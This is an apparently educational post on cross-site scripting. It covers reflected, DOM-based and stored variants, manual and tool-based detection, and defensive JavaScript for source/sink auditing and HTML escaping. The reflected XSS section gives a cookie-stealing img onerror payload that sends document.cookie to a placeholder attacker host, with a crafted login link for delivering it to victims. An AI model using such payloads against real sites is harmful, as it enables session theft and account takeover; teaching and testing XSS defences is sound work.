XSS


Majd abuleil

Cross-site scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious scripts into a website, which are then executed by the user’s browser. This can lead to a range of malicious activities, including stealing sensitive information, taking control of the user’s session, or performing unauthorized actions on the user’s behalf.

There are 3 types of Cross-site Scripting (XSS):

1- Reflected XSS => There are two forms of reflected XSS: self-XSS, and the form where the attacker sends a malicious link to a user, whose browser then executes the script in the context of their own account.

Example-1: <script>alert('hi')</script> → This is the basic probe used to check a site for self-XSS.

Example-2: <img src="x" onerror=fetch("http://hackersite/payload?cookie="+document.cookie); /> →

As we can see, the attacker can send this to a user inside a link like:

https://example.com/account/login?d=<img src="x" onerror=fetch("http://hackersite/payload?cookie="+document.cookie); />

When the user clicks this link, their browser sends the user's cookie to the attacker, who can use it to log in to the user's account.

2- DOM-Based XSS => DOM-Based XSS is a type of attack where the attacker manipulates the way a website’s code runs on your browser, without modifying the website itself. This causes the code to behave unexpectedly, allowing the attacker to execute malicious code.

DOM XSS vulnerabilities are primarily attributed to situations where user-controllable sources pass data to sinks, such as:

eval(), document.write, innerHTML

These sinks enable dynamic code execution. To identify potential vulnerabilities, look for user-controllable sources, including:

document.URL, document.referrer, location, location.href, location.search, location.hash

Knowing where data comes from and where it goes in your website's code is key to identifying security weaknesses. By understanding these sources and sinks, you can better identify and mitigate DOM-Based XSS vulnerabilities in your web application.
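A line-level audit of the sources and sinks listed above, as an added example that is not code from the original post. It assumes the page's script text is available as a string (SAMPLE_JS is constructed for the example). It is a grep-style heuristic, not taint tracking: a source copied into a variable on one line and written to a sink on another is missed, and a source that is encoded before reaching the sink is still flagged, so treat its output as a list of places to read, not as confirmed bugs.

```javascript
// Added example (not from the original post): flag statements where one of the
// user-controllable sources above reaches one of the sinks above.

const SOURCES = [
  "document.URL", "document.referrer", "location.href",
  "location.search", "location.hash", "location",
];

const SINKS = ["eval(", "document.write", "innerHTML"];

// Return the sources and sinks mentioned in a single statement.
function classifyStatement(stmt) {
  let sources = SOURCES.filter(s => stmt.includes(s));
  // "location" is a substring of "location.hash" etc.; keep the specific one.
  if (sources.some(s => s.startsWith("location."))) {
    sources = sources.filter(s => s !== "location");
  }
  const sinks = SINKS.filter(s => stmt.includes(s));
  return { sources, sinks };
}

// Split the script into statements (on ';' or newline) and report every
// statement that names both a source and a sink. Comment lines are skipped.
function auditDomXss(jsText) {
  const findings = [];
  jsText.split(/;|\n/).forEach((raw, index) => {
    const stmt = raw.trim();
    if (!stmt || stmt.startsWith("//")) return;
    const { sources, sinks } = classifyStatement(stmt);
    if (sources.length && sinks.length) {
      findings.push({ index, sources, sinks, stmt });
    }
  });
  return findings;
}

// Constructed sample page script for the audit (not real site code).
// Lines 2, 3 and 5 should be flagged; line 4 uses textContent, a safe sink.
const SAMPLE_JS = `
// reads the search term from the fragment and shows it
var term = location.hash.slice(1);
document.getElementById("out").innerHTML = "Results for " + location.hash;
document.write("<p>Referrer: " + document.referrer + "</p>");
document.getElementById("name").textContent = location.search;
eval(decodeURIComponent(location.search.substring(1)));
`;

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditDomXss(SAMPLE_JS)) {
    console.log(`statement ${f.index}: ${f.sources.join(",")} -> ${f.sinks.join(",")}`);
    console.log("   " + f.stmt);
  }
}
```

The textContent line is deliberately not flagged: that is the usual fix for the innerHTML case, because the browser treats textContent as text and never as markup.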

3-Stored XSS => Stored Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an attacker injects malicious code into a web application’s database, such as in a message forum, visitor log, or comment field. This malicious script is permanently stored on the target server, and when a victim requests the stored information, the script is retrieved and executed by the application. This type of attack is also referred to as Persistent XSS, as the malicious code remains on the server until it is removed or patched.

Example-1: On a website with a comment section, an attacker can use it like this:

1- The attacker types malicious code into the comment section and submits the comment.

2- The comment, including the malicious code, is saved in the website's comment database.

3- A user logs in to their account and opens the blog page where the malicious comment was saved.

4- The malicious code executes as soon as the user views the comment section where it is stored, allowing the attacker to steal their session cookies or take over their account, depending on the code.
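The storage step in the sequence above is not the bug; the bug is in step 4, where the stored text is written into the page as markup. The following is an added example, not code from the original post, showing the vulnerable rendering beside the hardened one. The comment rows, the escapeHtml helper and the function names are all constructed for the example.

```javascript
// Added example (not from the original post): rendering stored comments.
// The fix is HTML-encoding at output time, on every stored field, every time.

// Encode the five characters that can change HTML context.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// VULNERABLE: stored strings are concatenated straight into the HTML.
function renderCommentsUnsafe(comments) {
  return comments
    .map(c => `<li><b>${c.author}</b>: ${c.body}</li>`)
    .join("\n");
}

// HARDENED: every stored field is encoded before it enters the markup.
function renderCommentsSafe(comments) {
  return comments
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join("\n");
}

// Constructed sample rows, as they would come back from the comment table.
// The second body is a stored payload of the kind the post describes; the
// third shows that legitimate text containing < > & must survive encoding.
const STORED_COMMENTS = [
  { author: "alice", body: "Nice post, thanks!" },
  { author: "mallory", body: "<img src=x onerror=alert(1)>" },
  { author: "bob <script>", body: "5 > 3 && 2 < 4" },
];

// True if the rendered HTML still contains a live tag with the given name.
function hasLiveTag(html, tagName) {
  return new RegExp("<" + tagName + "\\b", "i").test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:\n" + renderCommentsUnsafe(STORED_COMMENTS));
  console.log("safe:\n" + renderCommentsSafe(STORED_COMMENTS));
}
```

Encoding belongs at the point where data enters the markup, not at submission time: the same stored comment may later be rendered into a JSON response, an attribute or an e-mail, each of which needs its own encoding.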

Tools & Techniques for Detecting XSS

Manual

I will break this into steps:

1- After choosing a website, first take about 10 to 15 minutes to see how the website or app works and where you could test for XSS. [Let's say there is a search bar on the site where you can search for anything, and you choose to test it for XSS.]

2- Type anything there, like [ TEST ]. There is no result, but when you view the source code you will see your word [ TEST ] in it.

If the word you typed produced no search results but appears in the page source, there is a 90% possibility that this site is vulnerable to XSS.

3- Try to break out of the surrounding source and type a payload that fits the context and works, OR, at this step, try an automatic tool.

[Here you can also use Burp Suite's Repeater to see how the website reacts and responds to your XSS payload.]
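The check in steps 2 and 3 (does the word come back, and do the characters that matter come back unencoded, and in which part of the page) can be done on the response body instead of by eye. The following is an added example, not code from the original post or from any tool it names; the marker, the probe layout, the context heuristic and both sample responses are constructed for the example. It only analyses HTML text, so it suits a security regression test against your own application's responses.

```javascript
// Added example (not from the original post): analyse a response body for
// reflections of a probe and report which characters survived unencoded.

const PROBE_CHARS = ['<', '>', '"', "'"];

// Entity forms a correctly encoding server would send back instead.
const ENCODED = {
  "<": ["&lt;"],
  ">": ["&gt;"],
  '"': ["&quot;", "&#34;"],
  "'": ["&#39;", "&#039;", "&#x27;", "&apos;"],
};

// Build the probe for a unique marker, e.g. "zq7x" -> zq7x<>"'
function buildProbe(marker) {
  return marker + PROBE_CHARS.join("");
}

// Heuristic HTML context of the given index: inside a <script> block,
// inside a tag (attribute context), or plain text.
function contextAt(body, index) {
  const before = body.slice(0, index);
  const lower = before.toLowerCase();
  if (lower.lastIndexOf("<script") > lower.lastIndexOf("</script")) return "script";
  if (before.lastIndexOf("<") > before.lastIndexOf(">")) return "attribute";
  return "text";
}

// For every occurrence of the marker, walk the probe characters that should
// follow it and record whether each came back literally or as an entity.
function analyzeReflection(body, marker) {
  const results = [];
  let from = 0;
  for (;;) {
    const idx = body.indexOf(marker, from);
    if (idx === -1) break;
    const after = body.slice(idx + marker.length, idx + marker.length + 40);
    const unencoded = [];
    const encoded = [];
    let cursor = 0;
    for (const ch of PROBE_CHARS) {
      if (after[cursor] === ch) { unencoded.push(ch); cursor += 1; continue; }
      const ent = ENCODED[ch].find(e => after.startsWith(e, cursor));
      if (!ent) break;            // probe truncated or transformed beyond here
      encoded.push(ch);
      cursor += ent.length;
    }
    results.push({ index: idx, context: contextAt(body, idx), unencoded, encoded });
    from = idx + marker.length;
  }
  return results;
}

// Constructed sample responses (not from any real site): one reflects the
// probe twice without encoding, the other encodes it correctly.
const MARKER = "zq7x";
const RESPONSE_UNENCODED = `<html><body><h1>Search</h1>
<input type="text" value="${buildProbe(MARKER)}">
<p>No results for ${buildProbe(MARKER)}</p></body></html>`;
const RESPONSE_ENCODED = `<html><body><h1>Search</h1>
<p>No results for zq7x&lt;&gt;&quot;&#39;</p></body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  for (const r of analyzeReflection(RESPONSE_UNENCODED, MARKER)) {
    console.log(`${r.context}: unencoded ${JSON.stringify(r.unencoded)}`);
  }
  console.log("encoded response:", analyzeReflection(RESPONSE_ENCODED, MARKER));
}
```

Use a marker that cannot occur naturally in the page, and read the context field before the unencoded list: a `"` surviving in attribute context and a `<` surviving in text context are the findings that deserve a manual look in Repeater.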

Automatic

There are a lot of tools that scan for XSS and give you the payload, BUT most of the time these tools give false positives.

Tools ==>

1- XSStrike: https://github.com/s0md3v/XSStrike

XSStrike is a tool designed to detect Cross-Site Scripting (XSS) vulnerabilities. It analyzes a website's response to different inputs and generates specific payloads that are more likely to exploit the vulnerabilities found, increasing the chances of successful XSS detection.

2-dalfox: https://github.com/hahwul/dalfox

Dalfox is a tool for finding XSS vulnerabilities. It provides various features such as single URL scanning, massive scanning, REST API server mode, and output customization.

Dalfox can:

1- Scan a single website
2- Scan many websites at once
3- Start a special server for scanning
4- Let you customize the scan results

Dalfox Modes:

Dalfox has 5 ways to work:

url: Scan one website
pipe: Use a special pipeline mode
file: Scan a list of websites or raw data
sxss: Find a special type of XSS weakness
server: Start a special server for scanning

CyberViperX
